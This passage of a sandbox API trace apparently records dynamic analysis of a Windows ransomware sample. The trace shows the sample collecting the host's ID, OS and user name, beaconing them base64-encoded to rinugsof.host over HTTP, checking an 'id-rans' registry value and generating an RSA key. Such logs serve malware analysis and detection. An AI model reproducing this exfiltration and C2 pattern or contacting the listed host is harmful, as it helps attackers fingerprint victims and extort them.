0x42f5e8 [0023.550] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x18) returned 0x42f608 [0023.550] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x46) returned 0x424150 [0023.550] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42ff68 | out: hHeap=0x410000) returned 1 [0023.550] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0023.551] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeConditionVariable") returned 0x77c78456 [0023.551] GetProcAddress (hModule=0x76d30000, lpProcName="SleepConditionVariableCS") returned 0x76dc4b32 [0023.551] GetProcAddress (hModule=0x76d30000, lpProcName="WakeAllConditionVariable") returned 0x77ca409d [0023.551] RtlInitializeConditionVariable () returned 0x1262128 [0023.551] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0023.552] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0023.552] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0023.552] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0023.552] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0023.552] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0023.552] GetProcAddress (hModule=0x76d30000, lpProcName="InitOnceExecuteOnce") returned 0x76d5d627 [0023.552] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventExW") returned 0x76dc410b [0023.552] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreW") returned 0x76d5ca5a [0023.552] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreExW") returned 0x76dc4195 [0023.552] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolTimer") returned 0x76d5ee7e [0023.552] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolTimer") returned 0x77c8441c [0023.552] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77cac50e [0023.552] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolTimer") returned 0x77cac381 [0023.552] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolWait") returned 0x76d5f088 [0023.552] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolWait") returned 0x77c905d7 [0023.553] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolWait") returned 0x77caca24 [0023.553] GetProcAddress (hModule=0x76d30000, lpProcName="FlushProcessWriteBuffers") returned 0x77c60b8c [0023.553] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77d1fde8 [0023.553] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessorNumber") returned 0x77cb1e1d [0023.553] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSymbolicLinkW") returned 0x76dbcd11 [0023.553] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentPackageId") returned 0x0 [0023.553] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount64") returned 0x76d5eee0 [0023.553] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileInformationByHandleEx") returned 0x76d5c78f [0023.553] GetProcAddress (hModule=0x76d30000, lpProcName="SetFileInformationByHandle") returned 0x76d6cbfc [0023.553] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimePreciseAsFileTime") returned 0x0 [0023.553] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeConditionVariable") returned 0x77c78456 [0023.553] GetProcAddress (hModule=0x76d30000, lpProcName="WakeConditionVariable") returned 0x77ce7de4 [0023.553] GetProcAddress (hModule=0x76d30000, lpProcName="WakeAllConditionVariable") returned 0x77ca409d [0023.553] GetProcAddress (hModule=0x76d30000, lpProcName="SleepConditionVariableCS") returned 0x76dc4b32 [0023.554] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeSRWLock") returned 0x77c78456 [0023.554] GetProcAddress (hModule=0x76d30000, lpProcName="AcquireSRWLockExclusive") returned 0x77c729f1 [0023.554] GetProcAddress (hModule=0x76d30000, lpProcName="TryAcquireSRWLockExclusive") returned 0x77c84892 [0023.554] GetProcAddress (hModule=0x76d30000, lpProcName="ReleaseSRWLockExclusive") returned 0x77c729ab [0023.554] GetProcAddress (hModule=0x76d30000, lpProcName="SleepConditionVariableSRW") returned 0x76dc4b74 [0023.554] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolWork") returned 0x76d5ee45 [0023.554] GetProcAddress (hModule=0x76d30000, lpProcName="SubmitThreadpoolWork") returned 0x77cb8491 [0023.554] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolWork") returned 0x77cad8e2 [0023.554] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringEx") returned 0x76dc46b1 [0023.554] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoEx") returned 0x76dc4751 [0023.554] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0023.554] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x800) returned 0x42f628 [0023.555] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0023.555] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x1216eac) returned 0x0 [0023.574] GetCurrentThread () returned 0xfffffffe [0023.574] GetThreadTimes (in: hThread=0xfffffffe, lpCreationTime=0x26f7b4, lpExitTime=0x26f7bc, lpKernelTime=0x26f7bc, lpUserTime=0x26f7bc | out: lpCreationTime=0x26f7b4, lpExitTime=0x26f7bc, lpKernelTime=0x26f7bc, lpUserTime=0x26f7bc) returned 1 [0023.574] RtlInitializeSListHead (in: ListHead=0x12630f0 | out: ListHead=0x12630f0) [0023.575] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x54) returned 0x430278 [0023.584] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc) returned 0x421710 [0023.586] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x14) returned 0x4302d8 [0023.586] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x26f5dc, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rvkjfc.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\rvkjfc.exe")) returned 0x30 [0023.587] GetSystemInfo (in: lpSystemInfo=0x26d4ec | out: lpSystemInfo=0x26d4ec*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0023.597] GetVolumeInformationW (in: lpRootPathName=0x0, lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x26d514, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x26d514*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0023.597] GetProcessHeap () returned 0x410000 [0023.597] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x40) returned 0x424df8 [0023.597] GetProcessHeap () returned 0x410000 [0023.597] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x40) returned 0x424e40 [0023.598] wsprintfW (in: param_1=0x424df8, param_2="%u" | out: param_1="1278171767") returned 10 [0023.598] wsprintfW (in: param_1=0x424e40, param_2="%u" | out: param_1="1972521061") returned 10 [0023.598] lstrcatW (in: lpString1="", lpString2="1278171767" | out: lpString1="1278171767") returned="1278171767" [0023.598] lstrcatW (in: lpString1="1278171767", lpString2="1972521061" | out: lpString1="12781717671972521061") returned="12781717671972521061" [0023.598] GetProcessHeap () returned 0x410000 [0023.598] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x424df8 | out: hHeap=0x410000) returned 1 [0023.598] GetProcessHeap () returned 0x410000 [0023.598] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x424e40 | out: hHeap=0x410000) returned 1 [0023.598] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x1, phkResult=0x26d588 | out: phkResult=0x26d588*=0x94) returned 0x0 [0023.598] RegQueryValueExW (in: hKey=0x94, lpValueName="ProductName", lpReserved=0x0, lpType=0x0, lpData=0x26d8b8, lpcbData=0x26d5c0*=0x200 | out: lpType=0x0, lpData=0x26d8b8*=0x57, lpcbData=0x26d5c0*=0x2e) returned 0x0 [0023.598] RegCloseKey (hKey=0x94) returned 0x0 [0023.598] GetUserNameW (in: lpBuffer=0x26eab8, pcbBuffer=0x26d5cc | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x26d5cc) returned 1 [0023.602] lstrcpyW (in: lpString1=0x26e2b8, lpString2="12781717671972521061" | out: lpString1="12781717671972521061") returned="12781717671972521061" [0023.602] lstrcatW (in: lpString1="12781717671972521061", lpString2=";" | out: lpString1="12781717671972521061;") returned="12781717671972521061;" [0023.602] lstrcatW (in: lpString1="12781717671972521061;", lpString2="Windows 7 Professional" | out: lpString1="12781717671972521061;Windows 7 Professional") returned="12781717671972521061;Windows 7 Professional" [0023.602] lstrcatW (in: lpString1="12781717671972521061;Windows 7 Professional", lpString2=" UserName: " | out: lpString1="12781717671972521061;Windows 7 Professional UserName: ") returned="12781717671972521061;Windows 7 Professional UserName: " [0023.602] lstrcatW (in: lpString1="12781717671972521061;Windows 7 Professional UserName: ", lpString2="5p5NrGJn0jS HALPmcxz" | out: lpString1="12781717671972521061;Windows 7 Professional UserName: 5p5NrGJn0jS HALPmcxz") returned="12781717671972521061;Windows 7 Professional UserName: 5p5NrGJn0jS HALPmcxz" [0023.602] lstrcatW (in: lpString1="12781717671972521061;Windows 7 Professional UserName: 5p5NrGJn0jS HALPmcxz", lpString2=";" | out: lpString1="12781717671972521061;Windows 7 Professional UserName: 5p5NrGJn0jS HALPmcxz;") returned="12781717671972521061;Windows 7 Professional UserName: 5p5NrGJn0jS HALPmcxz;" [0023.602] lstrcatW (in: lpString1="12781717671972521061;Windows 7 Professional UserName: 5p5NrGJn0jS HALPmcxz;", lpString2="Ad_finem@tutanota.com" | out: lpString1="12781717671972521061;Windows 7 Professional UserName: 5p5NrGJn0jS HALPmcxz;Ad_finem@tutanota.com") returned="12781717671972521061;Windows 7 Professional UserName: 5p5NrGJn0jS HALPmcxz;Ad_finem@tutanota.com" [0023.602] GetConsoleWindow () returned 0x30286 [0023.603] ShowWindow (hWnd=0x30286, nCmdShow=0) returned 1 [0023.604] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="12781717671972521061;Windows 7 Professional UserName: 5p5NrGJn0jS HALPmcxz;Ad_finem@tutanota.com", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 97 [0023.604] VirtualAlloc (lpAddress=0x0, dwSize=0x61, flAllocationType=0x3000, flProtect=0x4) returned 0x70000 [0023.604] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="12781717671972521061;Windows 7 Professional UserName: 5p5NrGJn0jS HALPmcxz;Ad_finem@tutanota.com", cchWideChar=-1, lpMultiByteStr=0x70000, cbMultiByte=97, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="12781717671972521061;Windows 7 Professional UserName: 5p5NrGJn0jS HALPmcxz;Ad_finem@tutanota.com", lpUsedDefaultChar=0x0) returned 97 [0023.606] CryptBinaryToStringW (in: pbBinary=0x70000, cbBinary=0x61, dwFlags=0x80000001, pszString=0x0, pcchString=0x26d538 | out: pszString=0x0, pcchString=0x26d538) returned 1 [0023.606] VirtualAlloc (lpAddress=0x0, dwSize=0x88, flAllocationType=0x3000, flProtect=0x4) returned 0x80000 [0023.606] CryptBinaryToStringW (in: pbBinary=0x70000, cbBinary=0x61, dwFlags=0x80000001, pszString=0x80000, pcchString=0x26d538 | out: pszString="MTI3ODE3MTc2NzE5NzI1MjEwNjE7V2luZG93cyA3IFByb2Zlc3Npb25hbCBVc2Vy\nTmFtZTogNXA1TnJHSm4walMgSEFMUG1jeHo7QWRfZmluZW1AdHV0YW5vdGEuY29t\nAA==\n", pcchString=0x26d538) returned 1 [0023.606] OpenMutexW (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="12781717671972521061") returned 0x0 [0023.606] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="12781717671972521061") returned 0xb8 [0023.606] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x26d550 | out: phkResult=0x26d550*=0xc0) returned 0x0 [0023.606] VirtualAlloc (lpAddress=0x0, dwSize=0x2000, flAllocationType=0x3000, flProtect=0x4) returned 0x140000 [0023.607] RegQueryValueExW (in: hKey=0xc0, lpValueName="id-rans", lpReserved=0x0, lpType=0x0, lpData=0x140000, lpcbData=0x26d590*=0x2000 | out: lpType=0x0, lpData=0x140000, lpcbData=0x26d590*=0x2000) returned 0x2 [0023.607] RegCloseKey (hKey=0xc0) returned 0x0 [0023.607] VirtualFree (lpAddress=0x140000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0023.608] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x110) returned 0x431d68 [0023.608] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x4310f8 [0023.609] InternetOpenW (lpszAgent="Random String", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0026.856] InternetConnectW (hInternet=0xcc0004, lpszServerName="rinugsof.host", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008 [0026.862] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x120) returned 0x43d7b8 [0026.864] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1ae) returned 0x43d8e0 [0026.865] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43d7b8 | out: hHeap=0x410000) returned 1 [0026.874] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="senior?bs=MTI3ODE3MTc2NzE5NzI1MjEwNjE7V2luZG93cyA3IFByb2Zlc3Npb25hbCBVc2Vy\nTmFtZTogNXA1TnJHSm4walMgSEFMUG1jeHo7QWRfZmluZW1AdHV0YW5vdGEuY29t\nAA==\n", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x26d4e4*="text/*", dwFlags=0x80000, dwContext=0x1) returned 0xcc000c [0026.878] HttpSendRequestW (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0) returned 0 [0034.326] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x80000016, lpBuffer=0x0, lpdwBufferLength=0x26d07c, lpdwIndex=0x0 | out: lpBuffer=0x0, lpdwBufferLength=0x26d07c, lpdwIndex=0x0) returned 0 [0034.326] GetLastError () returned 0x7a [0034.326] GetLastError () returned 0x7a [0034.326] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1c2) returned 0x466b90 [0034.326] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x80000016, lpBuffer=0x466b90, lpdwBufferLength=0x26d07c, lpdwIndex=0x0 | out: lpBuffer=0x466b90*, lpdwBufferLength=0x26d07c*=0x1c0, lpdwIndex=0x0) returned 1 [0034.326] OutputDebugStringW (lpOutputString="GET /senior?bs=MTI3ODE3MTc2NzE5NzI1MjEwNjE7V2luZG93cyA3IFByb2Zlc3Npb25hbCBVc2VyTmFtZTogNXA1TnJHSm4walMgSEFMUG1jeHo7QWRfZmluZW1AdHV0YW5vdGEuY29tAA== HTTP/1.1\r\nAccept: text/*\r\nUser-Agent: Random String\r\nHost: rinugsof.host\r\n\r\n") [0034.329] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466b90 | out: hHeap=0x410000) returned 1 [0034.329] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0034.329] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0034.329] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43d8e0 | out: hHeap=0x410000) returned 1 [0034.329] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0034.331] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4310f8 | out: hHeap=0x410000) returned 1 [0034.331] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x431d68 | out: hHeap=0x410000) returned 1 [0034.331] Sleep (dwMilliseconds=0x3e8) [0035.340] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x110) returned 0x431d68 [0035.340] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x4310f8 [0035.340] InternetOpenW (lpszAgent="Random String", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0035.340] InternetConnectW (hInternet=0xcc0004, lpszServerName="rinugsof.host", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008 [0035.340] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x120) returned 0x466e08 [0035.340] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1ae) returned 0x43d3e0 [0035.340] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466e08 | out: hHeap=0x410000) returned 1 [0035.340] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="senior?bs=MTI3ODE3MTc2NzE5NzI1MjEwNjE7V2luZG93cyA3IFByb2Zlc3Npb25hbCBVc2Vy\nTmFtZTogNXA1TnJHSm4walMgSEFMUG1jeHo7QWRfZmluZW1AdHV0YW5vdGEuY29t\nAA==\n", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x26d4e4*="text/*", dwFlags=0x80000, dwContext=0x1) returned 0xcc000c [0035.340] HttpSendRequestW (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0) returned 0 [0037.632] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x80000016, lpBuffer=0x0, lpdwBufferLength=0x26d07c, lpdwIndex=0x0 | out: lpBuffer=0x0, lpdwBufferLength=0x26d07c, lpdwIndex=0x0) returned 0 [0037.632] GetLastError () returned 0x7a [0037.632] GetLastError () returned 0x7a [0037.632] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1c2) returned 0x43d598 [0037.632] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x80000016, lpBuffer=0x43d598, lpdwBufferLength=0x26d07c, lpdwIndex=0x0 | out: lpBuffer=0x43d598*, lpdwBufferLength=0x26d07c*=0x1c0, lpdwIndex=0x0) returned 1 [0037.632] OutputDebugStringW (lpOutputString="GET /senior?bs=MTI3ODE3MTc2NzE5NzI1MjEwNjE7V2luZG93cyA3IFByb2Zlc3Npb25hbCBVc2VyTmFtZTogNXA1TnJHSm4walMgSEFMUG1jeHo7QWRfZmluZW1AdHV0YW5vdGEuY29tAA== HTTP/1.1\r\nAccept: text/*\r\nUser-Agent: Random String\r\nHost: rinugsof.host\r\n\r\n") [0037.632] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43d598 | out: hHeap=0x410000) returned 1 [0037.632] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0037.632] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0037.632] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43d3e0 | out: hHeap=0x410000) returned 1 [0037.632] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0037.632] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4310f8 | out: hHeap=0x410000) returned 1 [0037.632] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x431d68 | out: hHeap=0x410000) returned 1 [0037.632] Sleep (dwMilliseconds=0x3e8) [0038.645] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x110) returned 0x431d68 [0038.645] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x4310f8 [0038.645] InternetOpenW (lpszAgent="Random String", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0038.645] InternetConnectW (hInternet=0xcc0004, lpszServerName="rinugsof.host", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008 [0038.646] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x120) returned 0x466da0 [0038.646] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1ae) returned 0x43db48 [0038.646] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466da0 | out: hHeap=0x410000) returned 1 [0038.646] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="senior?bs=MTI3ODE3MTc2NzE5NzI1MjEwNjE7V2luZG93cyA3IFByb2Zlc3Npb25hbCBVc2Vy\nTmFtZTogNXA1TnJHSm4walMgSEFMUG1jeHo7QWRfZmluZW1AdHV0YW5vdGEuY29t\nAA==\n", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x26d4e4*="text/*", dwFlags=0x80000, dwContext=0x1) returned 0xcc000c [0038.646] HttpSendRequestW (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0) returned 0 [0040.939] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x80000016, lpBuffer=0x0, lpdwBufferLength=0x26d07c, lpdwIndex=0x0 | out: lpBuffer=0x0, lpdwBufferLength=0x26d07c, lpdwIndex=0x0) returned 0 [0040.939] GetLastError () returned 0x7a [0040.939] GetLastError () returned 0x7a [0040.939] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1c2) returned 0x466da0 [0040.939] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x80000016, lpBuffer=0x466da0, lpdwBufferLength=0x26d07c, lpdwIndex=0x0 | out: lpBuffer=0x466da0*, lpdwBufferLength=0x26d07c*=0x1c0, lpdwIndex=0x0) returned 1 [0040.939] OutputDebugStringW (lpOutputString="GET /senior?bs=MTI3ODE3MTc2NzE5NzI1MjEwNjE7V2luZG93cyA3IFByb2Zlc3Npb25hbCBVc2VyTmFtZTogNXA1TnJHSm4walMgSEFMUG1jeHo7QWRfZmluZW1AdHV0YW5vdGEuY29tAA== HTTP/1.1\r\nAccept: text/*\r\nUser-Agent: Random String\r\nHost: rinugsof.host\r\n\r\n") [0040.939] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466da0 | out: hHeap=0x410000) returned 1 [0040.939] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0040.939] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0040.939] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43db48 | out: hHeap=0x410000) returned 1 [0040.939] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0040.939] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4310f8 | out: hHeap=0x410000) returned 1 [0040.939] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x431d68 | out: hHeap=0x410000) returned 1 [0040.939] Sleep (dwMilliseconds=0x3e8) [0041.952] VirtualFree (lpAddress=0x80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.953] CryptAcquireContextW (in: phProv=0x26d55c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x26d55c*=0x457db8) returned 1 [0041.954] CryptGenKey (in: hProv=0x457db8, Algid=0x1, dwFlags=0x8000001, phKey=0x26d568 | out: phKey=0x26d568*=0x447368) returned 1 [0043.061] CryptExportKey (in: hKey=0x447368, hExpKey=0x0, dwBlobType=0x7, dwFlags=0x0, pbData=0x0, pdwDataLen=0x26d530 | out: pbData=0x0*, pdwDataLen=0x26d530*=0x494) returned 1 [0043.061] LocalAlloc (uFlags=0x0, uBytes=0x494) returned 0x43de78 [0043.061] CryptExportKey (in: hKey=0x447368, hExpKey=0x0, dwBlobType=0x7, dwFlags=0x0, pbData=0x43de78, pdwDataLen=0x26d530 | out: pbData=0x43de78*, pdwDataLen=0x26d530*=0x494) returned 1 [0043.062] CryptEncodeObjectEx (in: dwCertEncodingType=0x10001, lpszStructType=0x2b, pvStructInfo=0x43de78, dwFlags=0x0, pEncodePara=0x0, pvEncoded=0x0, pcbEncoded=0x26d530 | out: pvEncoded=0x0, pcbEncoded=0x26d530) returned 1 [0043.073] LocalAlloc (uFlags=0x0, uBytes=0x4a8) returned 0x46a0f0 [0043.073] CryptEncodeObjectEx (in: dwCertEncodingType=0x10001, lpszStructType=0x2b, pvStructInfo=0x43de78, dwFlags=0x0, pEncodePara=0x0, pvEncoded=0x46a0f0, pcbEncoded=0x26d530 | out: pvEncoded=0x46a0f0, pcbEncoded=0x26d530) returned 1 [0043.073] CryptExportPublicKeyInfo (in: hCryptProvOrNCryptKey=0x457db8, dwKeySpec=0x1, dwCertEncodingType=0x1, pInfo=0x0, pcbInfo=0x26d570 | out: pInfo=0x0, pcbInfo=0x26d570) returned 1 [0043.311] GetProcessHeap () returned 0x410000 [0043.311] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x13e) returned 0x464668 [0043.311] CryptExportPublicKeyInfo (in: hCryptProvOrNCryptKey=0x457db8, dwKeySpec=0x1, dwCertEncodingType=0x1, pInfo=0x464668, pcbInfo=0x26d570 | out: pInfo=0x464668, pcbInfo=0x26d570) returned 1 [0043.311] CryptEncodeObject (in: dwCertEncodingType=0x1, lpszStructType=0x8, pvStructInfo=0x464668, pbEncoded=0x0, pcbEncoded=0x26d54c | out: pbEncoded=0x0, pcbEncoded=0x26d54c) returned 1 [0043.312] GetProcessHeap () returned 0x410000 [0043.312] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x126) returned 0x43e318 [0043.312] CryptEncodeObject (in: dwCertEncodingType=0x1, lpszStructType=0x8, pvStructInfo=0x464668, pbEncoded=0x43e318, pcbEncoded=0x26d54c | out: pbEncoded=0x43e318, pcbEncoded=0x26d54c) returned 1 [0043.312] CryptBinaryToStringW (in: pbBinary=0x43e318, cbBinary=0x126, dwFlags=0x40000001, pszString=0x0, pcchString=0x26d538 | out: pszString=0x0, pcchString=0x26d538) returned 1 [0043.313] GetProcessHeap () returned 0x410000 [0043.313] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x312) returned 0x46e5e0 [0043.313] CryptBinaryToStringW (in: pbBinary=0x43e318, cbBinary=0x126, dwFlags=0x40000001, pszString=0x46e5e0, pcchString=0x26d538 | out: pszString="MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAlcL2ip2TbQLfCuNx8gbcgBmPTNOAgJWP44Gk15MpSBL/LFL4vaIiAHti0aYO+Gx91z+2lcwtHL4GowzPokP/Ek8fQ1aBKul0c2lDsldnh1W0QtHJcSWYYu9doev0wpBVf+ieWJ+Kvl1kXrNZTI3mBsgWT1wmZQ6Ab7tM4ulQ+t/ucrjaX1IVZy58KsOT+HmxDycLOP3Is8WjqC4XO/97XodpHxey9DVtqM4b6YZNiklhfeB14f0LOkEuKf/9FyMJvsWsJJpoiiP0ST9ESaoSRfFhDo/L0OF2q8tou3xlvZcDoHN8B+oCz/Qx0Jj4ekT0+eECpwzNfxNGRkqLTZhd3wIDAQAB", pcchString=0x26d538) returned 1 [0043.313] lstrlenW (lpString="-----END PUBLIC KEY-----") returned 24 [0043.313] lstrlenW (lpString="-----BEGIN PUBLIC KEY-----") returned 26 [0043.313] GetProcessHeap () returned 0x410000 [0043.313] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x384) returned 0x46e900 [0043.313] lstrcpyW (in: lpString1=0x46e900, lpString2="-----BEGIN PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY-----" [0043.313] lstrcatW (in: lpString1="-----BEGIN PUBLIC KEY-----", 